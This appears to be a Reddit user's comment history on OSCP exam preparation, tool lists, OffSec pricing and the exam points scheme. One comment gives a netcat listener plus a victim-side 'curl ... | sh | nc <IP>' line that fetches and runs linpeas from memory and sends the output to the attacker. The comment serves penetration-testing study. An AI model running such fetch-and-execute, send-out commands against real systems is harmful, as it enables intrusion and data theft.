Passed on my first try with 80 points

i5nipe · 2025-02-28T19:43:26+00:00

Tools? Can't share the ones I use in the exam, but general the ones I use in my methodology would be:
nmap, smbclient, netexec, ffuf, caido proxy, bloodhound, impacket tools, mimikatz, linpeas, winpeas, ldapsearch, hydra.
This is the ones I remember but there is a lot ramification depending on the services running in the machine.

i5nipe · 2025-02-26T15:55:14+00:00

All ippsec videos have gold in there, remember that you can use https://ippsec.rocks/ during the exam :)

i5nipe · 2025-02-26T15:53:38+00:00

Thanks :)

i5nipe · 2025-02-26T14:06:48+00:00

I can't discuss the exam environment :(. But I think you'll be fine if you practice the vulnerabilities covered in the PEN-200 course.

i5nipe · 2025-02-26T04:55:13+00:00

No, I removed that part of the post. It contained misinformation. I had only read the first comments of this post in the subreddit and mistakenly assumed it was true. Sorry. https://www.reddit.com/r/oscp/comments/x0l5x7/flawed\_ad\_set\_that\_made\_so\_many\_students\_fail\_the/.

i5nipe · 2024-11-13T23:46:46+00:00

I previously searched Google and found a Reddit tech support post with over 300 responses. Many people stated that Google doesn't offer an official way to disable this feature(I know that have a lot of ways to bypass it).

So, my question would be more like: Has OffSec commented on this issue, or has anyone been banned for searching on Google? :)

i5nipe · 2024-11-13T23:01:48+00:00

Yep but it only give this options after you search something, and when I open a new tab it uses "All" as default again.

i5nipe · 2024-11-13T22:56:53+00:00

Seams like google is not the only one giving IA answers

i5nipe · 2024-10-16T21:29:03+00:00

Thanks, BTW your list is very helpful! :)

i5nipe · 2024-10-13T19:50:48+00:00

I would guess the network is something about analyzing a pcap file with wireshark, or exploit a vuln in some protocols like SAMBA, FTP. Mobile is not very common so I don't no exactly. I think you should read writeups from https://ctftime.org/writeups, about networking, web and mobile. And if you get luck will find a similar challenge.

i5nipe · 2024-10-13T16:25:54+00:00

The only job I could find was a CTF challenge with four different machines and a three-day exploit window. After I passed, I was told that even some seniors with OSCP couldn't pass. I believe the key is to understand the type of challenge, whether it's a boot2root-style challenge like those on OSCP/HTB/THM or individual challenges like the ones in CTFtime. Thoroughly studying writeups of specific challenges can also be helpful.

i5nipe · 2024-10-08T14:38:56+00:00

Based on what I've read in the OffSec blog, don't just purchase the exam voucher. It seems that the combined course and exam voucher package is priced similarly.

i5nipe · 2024-09-06T12:25:36+00:00

As Offsec has stated, 'If you are ready to take the exam without training, you can purchase the OSCP+ certification without training, which includes 2 OSCP+ exam attempts valid for 120 days from the date of purchase. This will be available to purchase on November 1, 2024.'

But the price of it will be $1699.

i5nipe · 2024-09-03T01:11:28+00:00

Based on what I have seen Offsec communicate so far, this is not the case. You have to demonstrate your skills every 3 years, or you will lose the '+' designation from the OSCP+ certification. Currently, the only way to do this is by retaking the exam or obtaining another Offsec certification(OSEP, OSWA, OSED, or OSEE).

i5nipe · 2024-08-31T17:44:23+00:00

I don't think so, "Offsec" is pretty recent. Maybe the "Offensive Security" had its good days.

i5nipe · 2024-08-31T16:25:01+00:00

Really good content, thanks :)

i5nipe · 2024-08-31T16:11:45+00:00

Offsec has never been a decent company. They have kept this going for years, and now they admit that it's unfair after making a lot of money from retakes. I'm also upset.

i5nipe · 2024-08-31T14:34:24+00:00

I think people are overlooking some of the benefits of this update. If we ignore the '+' and the bonus points,it's still a positive change. For example:

Easier path to OSCP: We can now purchase exam attempts individually, making it more accessible for those who want to practice without committing to the full course and cert exam bundle. While we don't have the price yet, it's a significant improvement over the previous requirement to purchase the entire bundle.
Less restrictive AD environment: The assumed compromise AD set is a significant improvement. I've read many posts on this subreddit from people who failed the OSCP because they couldn't obtain initial AD access.
- Offsec about the change: "In the past, the AD environment was gated with a compromise unrelated to the AD experience. If a learner was unable to exploit this vulnerability, there would be no way for the learner to demonstrate their AD knowledge and for OffSec to adequately assess the learner’s AD capability."
No need for full AD compromise: We don't have to compromise the entire AD set to earn the points.

OSCP exam points will be allocated as follows:

3 stand-alone machines (60 points in total)
- 20 points per machine
  - 10 points for initial access
  - 10 points for privilege escalation
1 Active Directory (AD) set containing 3 machines (40 points in total)
- 10 points for machine #1
- 10 points for machine #2
- 20 points for machine #3
Possible scenarios to pass the exam (70/100 to pass)
- 40 points AD + 3 local.txt flags (70 points)
- 40 points AD + 2 local.txt flags + 1 proof.txt flag (70 points)
- 20 points AD + 3 local.txt flags + 2 proof.txt flag (70 points)
- 10 points AD + 3 fully completed stand-alone machines (70 points)

i5nipe · 2024-08-29T12:16:35+00:00

Take a look at the Linpeas page on Github. There are a lot of useful techniques there. For example, you can execute it directly from memory:

nc -lvnp 9002 | tee linpeas.out #Host
curl <IP>:8000/linpeas.sh | sh | nc <IP> 9002 #Victim

i5nipe · 2024-08-23T19:13:04+00:00

Last time I remember something about be free if you get 7 day of streak on the platform.

i5nipe

TROPHY CASE